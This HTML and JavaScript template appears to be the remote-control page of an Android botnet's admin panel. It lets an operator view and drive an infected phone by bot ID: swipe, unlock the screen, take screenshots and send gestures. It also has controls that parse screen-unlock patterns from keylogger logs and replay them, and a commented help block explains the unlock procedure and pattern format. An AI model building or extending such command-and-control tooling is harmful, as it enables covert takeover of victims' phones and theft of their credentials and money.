<style type="text/css">

BODY {
	background-color: #eee;
}

* {
	margin: 0;
	padding: 0;
}

#help LI {
	color: black;
	margin-left: 30px;
	margin-top: 10px;
}

#layout {
	border: 2px solid #666;
	position: fixed;
	z-index: 999;
}

#layout_screenshot {
	z-index: 1;
	position: fixed;
}

#layout_keyboard {
	position: fixed;
	z-index: 800;
	bottom: 43px;
	display: none;
	border: 1px solid blue;
}

.short_id {
	border: 0; font-family: monospace; font-size: 8pt;
}

.element {
	border: 0px solid #ccc;
/*	position: absolute; */
	overflow: hidden;
	text-overflow: ellipsis;
	font-size: 8pt;
	font-family: Monospace;
	white-space: nowrap;
	color: transparent;
}

.active {
	border: 1px solid blue;
	color: black;
}

.element:HOVER {
	border: 1px solid #666;
	color: blue;
}

.clickable {
	
}

/* redefine from header.html */
#messagePanelBody {
	position: fixed;
	top: 20px;
	right: 20px;
	width: 30vw;
}
</style>

<script src="rc/vnc.js?rnd=%RND%"></script>
<script src="rc/context/jquery-1.8.2.min.js"></script>
<script src="rc/context/jquery.contextMenu.js?rnd=%RND%"></script>
<link rel="stylesheet" media="all" href="rc/context/jquery.contextMenu.css">
<script src="rc/jquery.cookie.js"></script>

<script type="text/javascript">

$(document).ready(function(){

	$("#topMenu").hide()
 
	window.bot_id='%BOT_ID%'
	window.scale=%SCALE%
	window.text_only=%TEXT_ONLY%
	window.selection_mode=false  // custom gesture builder mode
	window.pattern_dots = []
	get_layout(window.bot_id, window.scale)
	
	//~ if($.cookie('auto_update') !== undefined)
	//~ {
		//~ if($.cookie('auto_update') === "true")
		//~ {
			//~ $('#auto_update').prop('checked', true)
		//~ }else{
			//~ $('#auto_update').prop('checked', false)
		//~ }
	//~ }
	
	toggleUpdate()
	
	$(document).ajaxStart(function () {
		$("#updateLabel").css('color', 'black')
	});

	$(document).ajaxStop(function () {
		$("#updateLabel").css('color', 'grey')
	});
	
	if(window.text_only)
	{
		$('#layout_screenshot').hide()
		if(!$('#show_layout').is(':checked')){
			$('.element').each(function(e){ $(this).addClass('active'); })
			$('#show_layout').prop('checked', true)
			$('#showLayoutLabel I').css('color', 'black')
		}
	}else{
	
		if($.cookie('show_layout') !== undefined)
		{
			if($.cookie('show_layout') === "true")
			{
				$('.element').each(function(e){ $(this).addClass('active'); })
				$('#show_layout').prop('checked', true)
				$('#showLayoutLabel I').css('color', 'black')
			}else{
				$('.element').each(function(e){ $(this).removeClass('active'); })
				$('#show_layout').prop('checked', false)
				$('#showLayoutLabel I').css('color', '#999')
			}
		}
		
		if($.cookie('show_screen') !== undefined)
		{
			if($.cookie('show_screen') === "true")
			{
				$('#layout_screenshot').show()
				$('#show_screen').prop('checked', true)
				$('#showScreenLabel I').css('color', 'black')
			}else{
				$('#layout_screenshot').hide()
				$('#show_screen').prop('checked', false)
				$('#showScreenLabel I').css('color', '#999')
			}
		}
	}
})

</script>


<div id="help" style="position: fixed; top: 20px; left: 0; width: 100%; display: none; z-index: 9999;">
	<div style="width: 600px; margin: 0 auto">
		<div class="panel panel-success">
			<div class="panel-heading text-center">VNC Help
			<span style="float: right" onclick="$('#help').hide()"><i class="flaticon-remove-symbol" style="font-size: 10pt;"></i></span>
			</div>
			<div class="panel-body">
				<div class='row'>
					<div class='col-md-6 textCenter'>
						<img src='rc/flags/EN.png' alt='En' /><br />
						<a href="tpls/_vnc_help.html" target="_blank">Documentation in English</a>
					</div>
					<div class='col-md-6 textCenter'>
						<img src='rc/flags/RU.png' alt='En' /><br />
						<a href="tpls/_vnc_help_ru.html" target="_blank">Документация на русском</a>
					</div>
				</div>
				<!-- Unlock screen:
				<ul>
					<li>click <button class="btn btn-primary btn-sm" disabled>Screen on</button> at left pane</li>
					<li>click <button class="btn btn-warning btn-sm" title="Swipe screen" disabled>&uarr;</button> to swipe screen up</li>
					<li>If <b>"Show layout"</b> checkbox is enabled, you will see pattern dots on the screen</li>
					<li>click <button class="btn btn-primary btn-sm" disabled>Send Pattern</button> and enter pattern key from keylogger logs</li>
				</ul>
				
				In case that "Swipe Up" does not open pattern area (as on Xiaomi), do "Swipe down" to open notifications area, then "Swipe up" again.
				<br />
				<br />
				You can set custom time of pattern entering in such format:
				<code>5000|178:988;359:988;540:988;359:1169;178:1350;359:1350;540:1350;</code>
				where is <code>5000</code> means <code>5</code> seconds. Default time is <code>1</code> second.
				-->
			</div>
		</div>
	</div>
</div>

<div class='row'>
	<div class='col-md-2' style="padding-top: 20px">

	<button class="btn btn-default btn-xs" onclick='$("#topMenu").toggle()'>Menu</button>

	<a title="Bot page" target="_blank" href="?a=admin&action=bots&bbot_id=%BOT_ID%&page=bot_page"><button class="btn btn-primary btn-xs"><i class="flaticon-information-button" style="color: white"></i></button></a>
	
	<a title="Tasks" target="_blank" href="?a=admin&action=bots&bbot_id=%BOT_ID%&page=tasks"><button class="btn btn-magenta btn-xs"><i class="flaticon-list" style="color: white"></i> %TASKS_NUM%</button></a>

	<button style="width: 40px" title="Commands" class="btn btn-success btn-xs" onclick="show_commands('%BOT_ID%')"><i class="flaticon-magic-wand" style="color: white"></i></button>

	<p style="margin: 5px"><small>
		<span style="color: darkred">%MODEL%</span><br />
		ID: <input type='text' class='short_id' onclick='this.select()' value='%BOT_ID%' /> 
		<button class="btn btn-xs btn-success %HIDE_COMMENT%" onclick='show_message($("#bot_comment").val(), "ok", false)'>Comment</button>
		<input id="bot_comment" type="hidden" value="%COMMENT%" />
	<!-- %LAST_SEEN% -->
	<span id='last_seen'></span>
	</small></p>
	<p style="margin: 5px; text-align: center"><small><span id='vnc_status' style='color: black'></span></small></p>

<div class='row'>
	<div class='col-md-2'></div>
	<div class='col-md-2 text-center'>
		<span onclick="toggleUpdate()"><input type="checkbox" style="position: fixed; top: -100px" checked id="auto_update" /> <label id="updateLabel" for="auto_update" title="Auto update screen"><i class="flaticon-refresh-arrow" style="font-weight: normal"></i></label></span>
	</div>
	<div class='col-md-2 text-center'>
		<span onclick="toggleLayout()"><input type="checkbox" style="position: fixed; top: -100px" id="show_layout" /><label id="showLayoutLabel" for="show_layout" title="Show text layout"><i class="flaticon-nine-black-tiles" style="color: black; font-weight: normal"></i></label></span>
	</div>
	<div class='col-md-2 text-center'>
		<input type="checkbox" id="show_screen" onclick="toggleScreen()" style="position: fixed; top: -100px" /> <label id="showScreenLabel" for="show_screen" title="Show screen image"><i class="flaticon-picture" style="color: black; font-weight: normal"></i></label>
	</div>
	<div class='col-md-4 text-center'>
		<span id="task_loading" style="float: right; display: none"><img title='Task waiting for the bot' src='rc/loading.gif' alt='Task...'/> <span id='tasks_amount' title='Amount of pending tasks'></span></span>
	</div>
</div>

<div id='gestureBuilderPanel' class='row' style="border: 0px solid green; margin-top: 0px; display: none">
	<div class='col-md-12'>
		<center><b>Gesture builder</b></center>
		<br />
		Point dots on the screen &rarr;<br />Dots added: <b id='dotsCollected'>0</b>
		<br />
		<br />
		Send as <label for='gest_type1'>gesture&nbsp;</label><input id='gest_type1' name='gest_type' value='gesture' type='radio' checked />
		<label for='gest_type2'>taps&nbsp;</label><input  id='gest_type2' name='gest_type' value='taps' type='radio' />
		 <br /><br />
		Duration/Delay <select id='gest_duration'>
			<option value='100'>0.1</option>
			<option value='500'>0.5</option>
			<option value='1000'>1</option>
			<option value='1500'>1.5</option>
			<option value='3000'>3</option>
		</select> sec<br /><br />
		Repeat <input type='text' value='1' size=1 width=10 id='gest_repeat' /> times
		<br />
		<br />
		<center><button class="btn btn-success btn-xs" onclick="sendGesture()">Send</button>
		<button class="btn btn-warning btn-xs" onclick="resetGesture()">Reset</button>
		<button class="btn btn-info btn-xs" onclick="cancelGesture()">Cancel</button>
		</center>
		<br />
		<br />
	</div>
</div>

<span id='buttonArea'>
	
<center style='margin-bottom: 5px'>
		<a href="%URL_ZOOM_OUT%"><button class="btn btn-success btn-xs"><i class="flaticon-zoom-out" style="color: white"></i></button></a>
		<a href="%URL_ZOOM_FULL%"><button class="btn btn-success btn-xs"><i class="flaticon-fullscreen-symbol" style="color: white"></i></button></a>
		<a href="%URL_ZOOM_IN%"><button class="btn btn-success btn-xs"><i class="flaticon-zoom-in" style="color: white"></i></button></a>
</center>


<div class='row' style='margin: 0'>
	<div class='col-md-4 text-center'>
		<div class='row' style='margin-top: 20px'>
			<div class='col-12 text-center'>
				<i class="flaticon-chevron-arrow-down" style="margin: 0; cursor: pointer; font-size: 15pt" title="Move keyboard up" onclick='$("#layout_keyboard").css("bottom", "-=10" )'></i>&nbsp;&nbsp;<i class="flaticon-keyboard" title="Show virtual keyboard" onclick='$("#layout_keyboard").toggle()' style="font-size: 15pt; margin: 0; cursor: pointer"></i>&nbsp;&nbsp;<i class="flaticon-chevron-arrow-up" title="Move keyboard down" style="margin: 0; cursor: pointer; font-size: 15pt" onclick='$("#layout_keyboard").css("bottom", "+=10" )'></i>
			</div>
		</div>
		
	</div>
	<div class='col-md-8 text-center'>
		<div class='row' style='margin: 0px'>
			<div class='col-12 text-center'>
				<button class="btn btn-warning btn-xs" title="Swipe Up" onclick="send_action('swipe_up')">&uarr;</button>
			</div>
		</div>

		<div class='row' style='margin-bottom: 5px'>
			<div class='col-12 text-center'>
				<button class="btn btn-warning btn-xs" title="Swipe Left" onclick="send_action('swipe_left')">&larr;</button>
				<button class="btn btn-warning btn-xs" title="Swipe Down" onclick="send_action('swipe_down')">&darr;</button>
				<button class="btn btn-warning btn-xs" title="Swipe Right" onclick="send_action('swipe_right')">&rarr;</button>
			</div>
		</div>
	</div>
</div>


<div class='row'>

<div class="text-center col-md-4"><button class="btn btn-info btn-xs" onclick="send_action('recents')"><img alt="Recents" src="rc/vnc_recents.png" width="24" /></button></div>
<div class="text-center col-md-4"><button class="btn btn-info btn-xs" onclick="send_action('home')"><img alt="minimize" src="rc/vnc_minimize.png" width="24" /></button></div>
<div class="text-center col-md-4"><button class="btn btn-info btn-xs" onclick="send_action('back')"><img alt="back" src="rc/vnc_back.png" width="24" /></button></div>

</div>

<hr />

<div class='row' style="margin-top: 10px">
	<div class='col-md-6 text-center'>
<button id="screen_on_button" class="btn btn-success btn-xs" style="width: 100%; %SCREEN_ON%" onclick="send_action('unlock_screen')">Screen on</button>
<button id="screen_off_button" class="btn btn-warning btn-xs" style="width: 100%; %SCREEN_OFF%" onclick="send_action('lock_screen')">Screen off</button>
	</div>
	<div class='col-md-6 text-center'>
		<button class="btn btn-danger btn-xs" style="width: 100%;" onclick="gestureBuilder()">Gesture</button>
	</div>
</div>

<div class='row' style="margin-top: 10px">
	<div class='col-md-6 text-center'>
		<a target='_blank' href='?a=admin&action=logs&bot_id=%BOT_ID%&parse_patterns=1'><button class="btn btn-success btn-xs" style="width: 100%" title="Parse patterns from keylogger">Get Patterns</button></a>
	</div>
	<div class='col-md-6 text-center'>
		<button id="sendPatternBtn" class="btn btn-magenta btn-xs" style="width: 100%" onclick="sendPattern()" title="Send unlock pattern from keylogger">Send Pattern</button>
	</div>
</div>


<hr />

<div class='row'>
	<div class='col-md-6 text-center'>
<button class="btn btn-default btn-xs w-100" style="width: 100%" onclick="send_action('quick_settings')" title="Open quick settings">Settings</button>
	</div>
	<div class='col-md-6 text-center'>
		<button class="btn btn-magenta btn-xs w-100" style="width: 100%" onclick="send_action('unlock_touch')" title="Remove accidental touch protection">Touch prot.</button>
	</div>
</div>


<div class='row' style="margin-top: 10px">
	<div class='col-md-6 text-center'>
<button class="btn btn-default btn-xs" style="width: 100%" onclick="send_action('notifications')" title="Open top notifications area">Notifications</button>
	</div>
	<div class='col-md-6 text-center'>
<button class="btn btn-default btn-xs" style="width: 100%" onclick="send_action('toggle_split_screen')" title="Toggle split screen">Split screen</button>
	</div>
</div>



<div class='row' style="margin-top: 10px">
	<div class='col-md-6 text-center'>
		<button class="btn btn-default btn-xs" style="width: 100%" onclick="send_action('take_screenshot')" title="Make screenshot on device">Screenshot</button>
	</div>
	<div class='col-md-6 text-center'>
		<button class="btn btn-success btn-xs" style="width: 100%" onclick="$('#help').toggle()">Help</button>
	</div>
</div>


<div class='row' style="margin-top: 10px">
	<div class='col-md-6 text-center'>
		<button class="btn btn-primary btn-xs" style="width: 100%" onclick="send_action('power')">Power</button>
	</div>
	<div class='col-md-6 text-center'>
		
	</div>
</div>

	</div>

	<div class='col-md-10'>
		<img id="layout_screenshot" src="%BG_IMAGE%" />
		<div id="layout" class="context-menu-one"></div>
		<img id="layout_keyboard" src="rc/keyboard.png" />
	</div>
</div>


<div id="commandsPanel" style="position: fixed; top: 220px; left: 0; width: 100%; display: none; z-index: 1000">
	<div style="width: 600px; margin: 0 auto"><!-- panel-danger  panel-default -->
		<div class="panel panel-primary">
			<div class="panel-heading text-center">Commands
				<span style="float: right" onclick="$('#commandsPanel').toggle()"><i class="flaticon-remove-symbol" style="font-size: 10pt;"></i></span>
			</div>
	
		<div id="commandsPanelBody" class="panel-body"></div>
	</div>
</div>

</span><!-- end button area -->
